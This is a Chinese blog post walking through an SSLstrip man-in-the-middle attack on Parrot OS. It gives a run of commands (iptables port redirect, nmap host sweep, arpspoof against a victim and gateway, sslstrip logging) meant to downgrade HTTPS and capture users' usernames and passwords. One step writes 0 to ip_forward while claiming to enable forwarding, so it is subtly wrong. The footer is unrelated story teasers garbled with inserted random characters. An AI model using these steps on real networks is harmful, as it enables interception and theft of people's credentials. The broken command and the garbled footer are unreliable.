利用parrot進(jìn)行SSLstrip

介紹

我們的目標(biāo)是嘗試訪問使用 https 網(wǎng)站的用戶. 路由器(網(wǎng)關(guān))會把受害者的訪問請求發(fā)送給我們,而攻擊者會把 https 轉(zhuǎn)換成 http 協(xié)議,然后扣下報(bào)文中的 用戶名和 密碼. 攻擊者會把請求報(bào)文發(fā)回給路由器(網(wǎng)關(guān)). 然后路由器會把這個新的請求發(fā)送給網(wǎng)站,這就是大概的攻擊機(jī)制.

具體步驟

首先我們需要打開終端,輸入 ifconfig 來查看我們的網(wǎng)卡
ifconfig

O1D$7S619@7NGM9F(J(%WXX.png

eth0代表有線網(wǎng)卡,wlan0代表無線網(wǎng)卡.
接下來我們需要輸入一條命令
echo 0 > /proc/sys/net/ipv4/ip_forward
開啟流量轉(zhuǎn)發(fā)功能
接下來配置路由表(iptables),把80端口的數(shù)據(jù)傳送到8080端口,也就是SSL欺騙需要監(jiān)聽的端口
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
現(xiàn)在我們需要找到網(wǎng)關(guān)的IP地址,輸入 route -n, GateWay 顯示的就是網(wǎng)關(guān)地址了
route -n
5SLRY~6L_{ERQGT73HK4Y%X.png

現(xiàn)在使用nmap獲取目標(biāo)主機(jī)的地址,在終端輸入
nmap -sP [網(wǎng)關(guān)地址]/24
2SQ$TSQL36{M%$CURH6U}05.png

可以看到目標(biāo)機(jī)的ip為:192.168.75.130
接下來我們進(jìn)行欺騙
arpspoof -i [網(wǎng)卡] -t [目標(biāo)ip] [網(wǎng)關(guān)ip]
arpspoof -i eth0 -t 192.168.75.130 192.168.75.2
然后新開一個終端開始監(jiān)聽
sslstrip -l 8080
打開終端,輸入cat sslstrip.log
QQ截圖20171021163203.png
QQ截圖20171021163203.png

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末丈积,一起剝皮案震驚了整個濱河市砾莱,隨后出現(xiàn)的幾起案子魄揉,更是在濱河造成了極大的恐慌妇押,老刑警劉巖,帶你破解...
    沈念sama閱讀 211,884評論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件跳昼,死亡現(xiàn)場離奇詭異般甲,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)鹅颊,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,347評論 3 385
  • 文/潘曉璐 我一進(jìn)店門敷存,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人堪伍,你說我怎么就攤上這事锚烦。” “怎么了帝雇?”我有些...
    開封第一講書人閱讀 157,435評論 0 348
  • 文/不壞的土叔 我叫張陵涮俄,是天一觀的道長。 經(jīng)常有香客問我摊求,道長,這世上最難降的妖魔是什么刘离? 我笑而不...
    開封第一講書人閱讀 56,509評論 1 284
  • 正文 為了忘掉前任室叉,我火速辦了婚禮,結(jié)果婚禮上硫惕,老公的妹妹穿的比我還像新娘茧痕。我一直安慰自己,他們只是感情好恼除,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,611評論 6 386
  • 文/花漫 我一把揭開白布踪旷。 她就那樣靜靜地躺著曼氛,像睡著了一般。 火紅的嫁衣襯著肌膚如雪令野。 梳的紋絲不亂的頭發(fā)上舀患,一...
    開封第一講書人閱讀 49,837評論 1 290
  • 那天,我揣著相機(jī)與錄音气破,去河邊找鬼聊浅。 笑死,一個胖子當(dāng)著我的面吹牛现使,可吹牛的內(nèi)容都是我干的低匙。 我是一名探鬼主播,決...
    沈念sama閱讀 38,987評論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼碳锈,長吁一口氣:“原來是場噩夢啊……” “哼顽冶!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起售碳,我...
    開封第一講書人閱讀 37,730評論 0 267
  • 序言:老撾萬榮一對情侶失蹤强重,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后团滥,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體竿屹,經(jīng)...
    沈念sama閱讀 44,194評論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,525評論 2 327
  • 正文 我和宋清朗相戀三年灸姊,在試婚紗的時候發(fā)現(xiàn)自己被綠了拱燃。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,664評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡力惯,死狀恐怖碗誉,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情父晶,我是刑警寧澤哮缺,帶...
    沈念sama閱讀 34,334評論 4 330
  • 正文 年R本政府宣布,位于F島的核電站甲喝,受9級特大地震影響尝苇,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜埠胖,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,944評論 3 313
  • 文/蒙蒙 一糠溜、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧直撤,春花似錦非竿、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,764評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽承匣。三九已至,卻和暖如春锤悄,著一層夾襖步出監(jiān)牢的瞬間韧骗,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,997評論 1 266
  • 我被黑心中介騙來泰國打工铁蹈, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留宽闲,地道東北人。 一個月前我還...
    沈念sama閱讀 46,389評論 2 360
  • 正文 我出身青樓握牧,卻偏偏與公主長得像容诬,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子沿腰,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,554評論 2 349

推薦閱讀更多精彩內(nèi)容

  • 簡單說說利用parrot進(jìn)行SSLstrip 0x00前記 今天看了個視頻,學(xué)習(xí)到了如何進(jìn)行 SSLstrip.我...
    吐那個兔弘閱讀 2,586評論 1 4
  • 個人認(rèn)為览徒,Goodboy1881先生的TCP /IP 協(xié)議詳解學(xué)習(xí)博客系列博客是一部非常精彩的學(xué)習(xí)筆記,這雖然只是...
    貳零壹柒_fc10閱讀 5,051評論 0 8
  • 1.這篇文章不是本人原創(chuàng)的颂龙,只是個人為了對這部分知識做一個整理和系統(tǒng)的輸出而編輯成的习蓬,在此鄭重地向本文所引用文章的...
    SOMCENT閱讀 13,051評論 6 174
  • 9.1 引言 選路是IP最重要的功能之一。圖9-1是IP層處理過程的簡單流程措嵌。需要進(jìn)行選路的數(shù)據(jù)報(bào)可以由本地主機(jī)產(chǎn)...
    張芳濤閱讀 1,187評論 0 2
  • 夏日午后,躺在椅子上躲叼,聽著chan chan,手跟著他的節(jié)奏擺動著…… 記得企巢,第一次聽到它時枫慷,也是在夏天,太...
    IANBI閱讀 285評論 0 0